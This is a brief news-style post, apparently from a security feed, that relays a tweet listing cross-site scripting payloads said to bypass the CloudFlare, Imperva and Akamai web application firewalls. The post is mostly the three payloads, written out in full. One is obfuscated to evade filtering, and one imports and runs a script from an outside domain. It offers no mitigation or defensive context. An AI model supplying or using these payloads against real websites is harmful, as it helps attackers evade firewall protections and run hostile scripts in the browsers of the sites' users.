The tweet mentions XSS bypass payloads for CloudFlare, Imperva, and Akamai WAFs. The payloads include <Img Src=OnXSS OnError=alert(1)> for CloudFlare, <Img Src=//X55.is OnLoad%0C=import(Src)// for Imperva, and <A AutoFocus HRef %252F=""OnFocus=top/**/?.['al'%2B'ert'](1)> for Akamai. These payloads exploit vulnerabilities in the respective WAFs to execute malicious scripts. More details can be found in the tweet linked by @BRuteLogic.
Check out the original tweet here: https://twitter.com/KN0X55/status/1803731979466076442
Subscribe for the latest news: